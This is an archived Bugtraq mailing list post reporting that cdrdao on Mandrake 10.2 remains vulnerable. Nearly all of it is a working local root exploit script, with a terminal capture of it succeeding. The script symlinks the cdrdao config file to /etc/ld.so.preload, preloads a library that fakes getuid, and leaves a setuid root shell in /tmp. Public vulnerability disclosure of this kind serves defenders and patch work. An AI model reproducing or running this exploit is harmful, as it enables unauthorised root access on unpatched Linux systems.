Home page logo
/

bugtraq logo Bugtraq mailing list archives

cdrdao exploit for mandrake 10.2 ( Mandriva 2005)
From: newbug Tseng <newbug () chroot org>
Date: 16 May 2005 03:09:10 -0000



Hi.
Seems cdrdao vulnerability still exist in Mandrake 10.2 (Mandriva 2005).
I've no idea why Mandrake always forgot to fix this vulnerability ...
Anyway, hope Mandrike will fix this vulnerability as soon as possible.

--- screenshot ---
[newbug () t43 ~]$ cat /etc/mandrake-release
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
[newbug () t43 ~]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-7mdk
[newbug () t43 ~]$ ./cdrdao_exp.sh
cdrdao private exploit
This exploit only for Mandrake series
newbug [at] chroot.org
May 2005
checking if cdrdao is setuid ...
[+] done.
checking if /etc/ld.so.preload already exist ...
[+] done.
checking if ~/.cdrdao already exist ...
[+] done.
preparing hook library ...
[+] done.
preparing shell program ...
[+] done.
link .cdrdao ==> /etc/ld.so.preload ...
[+] done.
compile hook library ...
[+] done.
compile shell program ...
[+] done.
run cdrdao ...
[+] done.
checking if /etc/ld.so.preload created successful...
[+] done.
! () #$@%#$%#$%! () %^
[+] Congratulation, You win the game !!
[root () t43 tmp]# id
uid=0(root) gid=0(root) groups=500(newbug)
[root () t43 tmp]# 
--- end of screenshot ---
--- cdrdao_exp.sh ---
#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org 
# IRC: irc.chroot.org #chroot
# May 2005
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org" 
echo "May 2005"

echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
        echo "[-] Failed";
        exit
fi
echo "[+] done.";
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
        echo "[-] Failed."
        exit
else
        echo "[+] done."
fi

echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
        rm -rf ~/.cdrdao
fi
echo "[+] done."

cd /tmp

echo "preparing hook library ..."
cat >ld.so.c<<EOF
#include <stdlib.h>
uid_t getuid()
{
        return 0;
}
EOF
echo "[+] done."
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main(int argc,char **argv)
{
        setreuid(0,0);
        setgid(0);

        unlink("/tmp/ld.so");
        if(getuid())
        {
                printf("[-] Failed.\n");
                unlink(argv[0]);
                exit(0);
        }
        printf("[+] Congratulation, You win the game !!\n");
        unlink("/etc/ld.so.preload");

        execl("/bin/bash","bash",(char *)0);

        return 0;
}
EOF
echo "[+] done."

echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."

echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."

umask 0

echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."

echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
        echo "[+] done."
else
        echo "[-] Failed."
        exit
fi
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "! () #\$@%#$%#$%! () %^"
/tmp/sh
--- end of cdrdao_exp.sh ---


  By Date           By Thread  

Current thread:
  • cdrdao exploit for mandrake 10.2 ( Mandriva 2005) newbug Tseng (May 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault